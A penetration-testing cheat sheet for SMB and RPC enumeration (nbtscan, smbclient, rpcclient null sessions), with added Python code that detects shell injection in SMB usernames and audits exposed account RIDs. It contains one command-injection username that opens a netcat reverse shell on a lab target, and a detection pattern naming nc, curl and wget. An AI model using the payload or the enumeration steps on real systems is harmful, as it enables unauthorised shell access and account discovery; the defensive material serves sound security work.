SMB Enumeration


Get Hostname

nbtscan <ip-address>

Get Hostname of IP Range

nbtscan -r <ip-range>

Get Shares

smbclient -I <ip-address> -L <hostname>

Interact with Share

smbclient //<ip-address>/share -U <user>

Command injection in SMB Username

smbclient -I <ip-address> -L METASPLOITABLE -U "/=nohup mkfifo /tmp/p; nc 4444 0</tmp/p | /bin/sh >/tmp/p 2>&1; rm /tmp/p"
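The username above is a shell payload, not an account name, so a defender can catch it with a simple check on the username field of authentication logs before it ever reaches a username-map script. The following detector is an added example, not part of the original cheat sheet: the `user=[...] from=[...]` log line format and the sample lines are constructed for this example (Samba's own log format differs), and the indicator list is a starting point, not a complete grammar of shell injection.

```python
import re

# Shell syntax that has no business in an SMB account name. The injected
# username from the cheat sheet ("/=nohup ... ; nc ... | /bin/sh ...") trips
# several of these at once, which is what makes the check robust.
INDICATORS = {
    "separator": re.compile(r"[;|&\n]"),              # command chaining / pipes
    "substitution": re.compile(r"\$\(|`"),            # $(...) and backticks
    "redirect": re.compile(r"[<>]"),                  # fd redirection
    "path": re.compile(r"/(bin|tmp|dev)/"),           # absolute paths to shells/fifos
    "tool": re.compile(r"\b(nc|ncat|mkfifo|nohup|bash|sh|wget|curl|python)\b"),
}

# Characters a real account name may contain (DOMAIN\user, machine accounts
# ending in $, UPN-style user@domain). Anything else is flagged as well.
VALID_NAME = re.compile(r"^[A-Za-z0-9._\-$@\\ ]{1,104}$")


def classify_username(name: str) -> list[str]:
    """Return the indicator names that fire on an SMB username; an empty list means clean."""
    hits = [label for label, rx in INDICATORS.items() if rx.search(name)]
    if not VALID_NAME.match(name):
        hits.append("invalid_chars")
    return hits


# Constructed sample log lines (hypothetical format, not real Samba output).
SAMPLE_LOG = [
    "auth: user=[jsmith] from=[10.0.0.5] result=NT_STATUS_OK",
    "auth: user=[CORP\\WS01$] from=[10.0.0.9] result=NT_STATUS_OK",
    "auth: user=[/=nohup mkfifo /tmp/p; nc 4444 0</tmp/p | /bin/sh >/tmp/p 2>&1; rm /tmp/p]"
    " from=[10.0.0.77] result=NT_STATUS_LOGON_FAILURE",
]

LOG_LINE = re.compile(r"user=\[(.*)\] from=\[([^\]]*)\]")


def scan_log(lines):
    """Extract username and source from each line and return the entries that look injected."""
    flagged = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        username, source = m.group(1), m.group(2)
        hits = classify_username(username)
        if hits:
            flagged.append({"source": source, "username": username, "indicators": hits})
    return flagged


if __name__ == "__main__":
    for entry in scan_log(SAMPLE_LOG):
        print(f"{entry['source']}: {entry['indicators']} -> {entry['username']!r}")
```

Run on the sample, only the third line is reported, with `separator`, `redirect`, `path`, `tool` and `invalid_chars` all firing; the two legitimate names pass. In practice the same check belongs in front of any script that receives the client-supplied username, since validating the name is the fix and the log scan is only the detection.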

Mount Share (Windows)

net use \\<target-ip>\share <password> /u:<username>

RPC Enumeration

rpcclient (null session)

rpcclient -U "" -N <ip-address>

Get RPC Info from a List of Servers

nmap -sV -p 111 --script=rpcinfo <ip-range>

List all Groups

enumdomgroups
Query a Group

querygroup 0x44f

Query Member of Group

querygroupmem 0x44f

Query Users

enumdomusers
Query a User

queryuser 0x451
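The RIDs passed to querygroup and queryuser come from the `name:[...] rid:[0x...]` lines that enumdomgroups and enumdomusers print. The parser below is an added example, not part of the original cheat sheet: it turns that output into a name-to-RID map and summarises what an unauthenticated null session exposed, which is the question an audit of the host actually needs answered. The sample output and the account names in it are constructed; the RID semantics (500/501 for Administrator/Guest, 512/513 for Domain Admins/Users, values from 1000 upward for accounts and groups created on the domain) are standard.

```python
import re

# One pattern covers both enumdomusers ("user:[...] rid:[0x...]") and
# enumdomgroups ("group:[...] rid:[0x...]") output lines.
ENUM_LINE = re.compile(r"^(user|group):\[(.*)\] rid:\[0x([0-9a-fA-F]+)\]\s*$")

# RIDs fixed by the SAM. Everything below 1000 is reserved for built-in
# principals; administrator-created accounts and groups start at 1000 (0x3e8).
WELL_KNOWN = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
}
FIRST_CUSTOM_RID = 1000

# Constructed sample output (names are invented; the line format is rpcclient's).
ENUMDOMUSERS = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[labsvc] rid:[0x451]
"""
ENUMDOMGROUPS = """\
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Lab Operators] rid:[0x44f]
"""


def parse_enum(text):
    """Map each enumerated name to its integer RID; lines that do not match are skipped."""
    result = {}
    for line in text.splitlines():
        m = ENUM_LINE.match(line.strip())
        if m:
            result[m.group(2)] = int(m.group(3), 16)
    return result


def rid_hex(rid):
    """Format a RID the way queryuser/querygroup take it on the rpcclient prompt (0x451)."""
    return f"0x{rid:x}"


def audit(users, groups):
    """Summarise the exposure: how much a null session could list, and which
    principals are site-specific (RID >= 1000) rather than built in."""
    return {
        "exposed_users": len(users),
        "exposed_groups": len(groups),
        "admin_present": users.get("Administrator") == 500,
        "custom_users": sorted((n, rid_hex(r)) for n, r in users.items() if r >= FIRST_CUSTOM_RID),
        "custom_groups": sorted((n, rid_hex(r)) for n, r in groups.items() if r >= FIRST_CUSTOM_RID),
    }


if __name__ == "__main__":
    users = parse_enum(ENUMDOMUSERS)
    groups = parse_enum(ENUMDOMGROUPS)
    for name, rid in {**users, **groups}.items():
        print(f"{rid_hex(rid):>6}  {name}  ({WELL_KNOWN.get(rid, 'site-specific')})")
    print(audit(users, groups))
```

If a host answers these enumerations over a null session at all, that is the finding; the custom-RID lists show which accounts an anonymous client learned about, and restricting anonymous access (the `restrict anonymous` setting on Samba, the equivalent RestrictAnonymous policy on Windows) is the fix.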